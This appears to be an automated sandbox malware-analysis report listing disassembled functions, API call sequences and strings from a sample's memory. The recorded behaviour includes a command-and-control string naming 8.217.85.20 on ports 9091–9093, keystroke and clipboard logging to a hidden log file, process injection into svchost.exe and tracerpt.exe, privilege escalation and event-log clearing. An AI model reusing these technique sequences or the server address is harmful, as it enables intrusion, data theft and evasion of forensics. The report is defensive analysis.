                                                                                                    • Part of subcall function 02D15D22: _free.LIBCMT ref: 02D15DE4
                                                                                                    • Part of subcall function 02D15D22: _strlen.LIBCMT ref: 02D15DEB
                                                                                                    • Part of subcall function 02D15D22: __malloc_crt.LIBCMT ref: 02D15DF2
                                                                                                    • Part of subcall function 02D15D22: _strlen.LIBCMT ref: 02D15E08
                                                                                                    • Part of subcall function 02D15D22: _strcpy_s.LIBCMT ref: 02D15E16
                                                                                                    • Part of subcall function 02D15D22: __invoke_watson.LIBCMT ref: 02D15E2B
                                                                                                    • Part of subcall function 02D15D22: _free.LIBCMT ref: 02D15E3A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 1828324828-0
                                                                                                  • Opcode ID: 9737f7dbaa0b32071bcf3373546b01f0b7fcb8855630a5ab9e26cc6163751bc8
                                                                                                  • Instruction ID: 826427d194745f661d6c6421d7cd89b9a7016c3a1d4652026ea22358863f7b85
                                                                                                  • Opcode Fuzzy Hash: 9737f7dbaa0b32071bcf3373546b01f0b7fcb8855630a5ab9e26cc6163751bc8
                                                                                                  • Instruction Fuzzy Hash: 1BE0EC75CC5728F7D622ABE0B60261CB365EB94F22F504519E09012F89CA704D51DEB2
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(|p1:8.217.85.20|o1:9091|t1:1|p2:8.217.85.20|o2:9092|t2:1|p3:8.217.85.20|o3:9093|t3:1|dd:1|cl:1|fz:), ref: 00974755
                                                                                                    • Part of subcall function 00973260: __wcsrev.LIBCMT ref: 00990655
                                                                                                  Strings
                                                                                                  • |p1:8.217.85.20|o1:9091|t1:1|p2:8.217.85.20|o2:9092|t2:1|p3:8.217.85.20|o3:9093|t3:1|dd:1|cl:1|fz:, xrefs: 00974750
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __wcsrevlstrlen
                                                                                                  • String ID: |p1:8.217.85.20|o1:9091|t1:1|p2:8.217.85.20|o2:9092|t2:1|p3:8.217.85.20|o3:9093|t3:1|dd:1|cl:1|fz:
                                                                                                  • API String ID: 4062721203-3341059043
                                                                                                  • Opcode ID: 33608de47a95b539af32dcd2e40bd5fa4ee1e16261ff02d472b19657d6a6c207
                                                                                                  • Instruction ID: 0495fac52b4950a5b1976484ec7556489293eaea825c7128b2fb9efe85a119dd
                                                                                                  • Opcode Fuzzy Hash: 33608de47a95b539af32dcd2e40bd5fa4ee1e16261ff02d472b19657d6a6c207
                                                                                                  • Instruction Fuzzy Hash: CCC08CB2248208CFEA003BD89408B2C3324EBB3B15F20C432F618C6642D9558C10F3B3
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: 3090f025b9aabfcabd9902f0d0db14deab5623b230e306175c74f0a697886e75
                                                                                                  • Instruction ID: d06f2ae5ee441295bf6539250b8306a724c386d3c385025954006f765e64b582
                                                                                                  • Opcode Fuzzy Hash: 3090f025b9aabfcabd9902f0d0db14deab5623b230e306175c74f0a697886e75
                                                                                                  • Instruction Fuzzy Hash: 9AE09278918609EBDB14EF40D594BFD77B57B50304F30A555D00A6B294D37C2B08AB91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3660427363-0
                                                                                                  • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                  • Instruction ID: 94a50d4412003edb3e3fd3c2fe5a1f12d39b74b855576bea46f7b17f455e1d91
                                                                                                  • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                  • Instruction Fuzzy Hash: C1C08C22D4C75CE681207C545C29278B6E88704351F30ACB3A85B216C0A0AC2A9077EA
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0098FAB1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2882836952-0
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 00990693
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: send
                                                                                                  • String ID:
                                                                                                  • API String ID: 2809346765-0
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32 ref: 00975EB2
                                                                                                    • Part of subcall function 00976F17: _malloc.LIBCMT ref: 00976F31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 617756273-0
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0E8A9
                                                                                                  • Sleep.KERNEL32(00000001,?,?,?,02D0604D), ref: 02D0E8B3
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0E8BF
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0E8D2
                                                                                                  • InterlockedExchange.KERNEL32(02D31F08,00000000), ref: 02D0E8DA
                                                                                                  • OpenClipboard.USER32(00000000), ref: 02D0E8E2
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 02D0E8EA
                                                                                                  • GlobalSize.KERNEL32(00000000), ref: 02D0E8FB
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 02D0E90C
                                                                                                  • wsprintfW.USER32 ref: 02D0E985
                                                                                                  • _memset.LIBCMT ref: 02D0E9A3
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D0E9AC
                                                                                                  • CloseClipboard.USER32 ref: 02D0E9B2
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0E9CA
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 02D0E9E4
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0EA02
                                                                                                  • lstrlenW.KERNEL32(02D25B48,?,00000000), ref: 02D0EA16
                                                                                                  • WriteFile.KERNEL32(00000000,02D25B48,00000000), ref: 02D0EA25
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0EA2C
                                                                                                  • ReleaseMutex.KERNEL32(00000000), ref: 02D0EA38
                                                                                                  • GetKeyState.USER32(00000014), ref: 02D0EABC
                                                                                                  • lstrlenW.KERNEL32(02D2B4A8), ref: 02D0EB0B
                                                                                                  • wsprintfW.USER32 ref: 02D0EB1D
                                                                                                  • lstrlenW.KERNEL32(02D2B4D0), ref: 02D0EB3E
                                                                                                  • lstrlenW.KERNEL32(02D2B4D0), ref: 02D0EB61
                                                                                                  • wsprintfW.USER32 ref: 02D0EB7F
                                                                                                  • wsprintfW.USER32 ref: 02D0EB95
                                                                                                  • wsprintfW.USER32 ref: 02D0EBBF
                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 02D0EC0B
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0EC21
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 02D0EC3B
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0EC59
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000000), ref: 02D0EC69
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 02D0EC74
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0EC7B
                                                                                                  • ReleaseMutex.KERNEL32(00000000), ref: 02D0EC88
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
• Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                  • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                  • API String ID: 1637302245-2373594894
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D07804
                                                                                                  • _memset.LIBCMT ref: 02D07850
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02D07864
                                                                                                    • Part of subcall function 02D08720: _vswprintf_s.LIBCMT ref: 02D08731
                                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07893
                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 02D078DA
                                                                                                    • Part of subcall function 02D07740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,02D078FC), ref: 02D07756
                                                                                                    • Part of subcall function 02D07740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,02D078FC,?,?,?,?,?,?,76F90630), ref: 02D0775D
                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0790A
                                                                                                  • _memset.LIBCMT ref: 02D07923
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0793B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07944
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07956
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07959
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0796B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D0796E
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07980
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07983
                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0798B
                                                                                                  • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07992
                                                                                                  • _memset.LIBCMT ref: 02D079B4
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,76F90630), ref: 02D079CA
                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 02D079FF
                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 02D07A1B
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 02D07A43
                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 02D07A58
                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,02D076F0,00001000,00000000), ref: 02D07A72
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 02D07A90
                                                                                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 02D07AA1
                                                                                                  • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76F90630), ref: 02D07ABA
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 02D07AD6
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 02D07AE8
                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76F90630), ref: 02D07AF1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
• Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                  • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                  • API String ID: 4176418925-3213446972
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00975849
                                                                                                  • _memset.LIBCMT ref: 00975868
                                                                                                  • _memset.LIBCMT ref: 0097589D
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 009758B1
                                                                                                    • Part of subcall function 009759E0: _vswprintf_s.LIBCMT ref: 009759F1
                                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 009758E0
                                                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00975928
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,76F90630), ref: 0097594E
                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 00975968
                                                                                                  • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 00975987
                                                                                                  • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 009759A2
                                                                                                  • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 009759C1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                  • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                  • API String ID: 2170139861-1986163084
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D07E73
                                                                                                  • _memset.LIBCMT ref: 02D07E9F
                                                                                                  • _memset.LIBCMT ref: 02D07ED4
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02D07EE8
                                                                                                    • Part of subcall function 02D08720: _vswprintf_s.LIBCMT ref: 02D08731
                                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 02D07F15
                                                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02D07F65
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 02D07F92
                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 02D07FAA
                                                                                                  • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 02D07FCC
                                                                                                  • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 02D07FEA
                                                                                                  • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 02D07FFF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                  • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                  APIs
                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,02D30D80,76F8E010,76F92FA0,76F90F00,?,02D06028,?,?), ref: 02D0E519
                                                                                                  • lstrcatW.KERNEL32(02D30D80,\DisplaySessionContainers.log,?,02D06028,?,?), ref: 02D0E529
                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,02D30D80,?,02D06028,?,?), ref: 02D0E538
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02D06028,?,?), ref: 02D0E546
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000080,00000000,?,02D06028,?,?), ref: 02D0E563
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,02D06028,?,?), ref: 02D0E56E
                                                                                                  • CloseHandle.KERNEL32(00000000,?,02D06028,?,?), ref: 02D0E577
                                                                                                  • DeleteFileW.KERNEL32(02D30D80,?,02D06028,?,?), ref: 02D0E58A
                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,02D06028,?,?), ref: 02D0E597
                                                                                                  • DirectInput8Create.DINPUT8(?,00000800,02D24934,02D31220,00000000,?,02D06028,?,?), ref: 02D0E5B2
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0E665
                                                                                                  • GetKeyState.USER32(00000014), ref: 02D0E672
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                  • String ID: <$\DisplaySessionContainers.log
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,02D0DFA4), ref: 02D07637
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,02D0DFA4), ref: 02D0763E
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 02D0765A
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07677
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07681
                                                                                                  • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,02D0DFA4), ref: 02D07691
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07698
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 02D076BA
                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 02D076C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                  • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D10576
                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 02D1058E
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 02D1059E
                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D105AE
                                                                                                  • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 02D10600
                                                                                                  • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 02D10615
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                  • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                  • GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                  APIs
                                                                                                  • OpenEventLogW.ADVAPI32(00000000,02D258BC), ref: 02D0B3E7
                                                                                                  • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 02D0B3F2
                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 02D0B3F9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Event$ClearCloseOpen
                                                                                                  • String ID: Application$Security$System
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
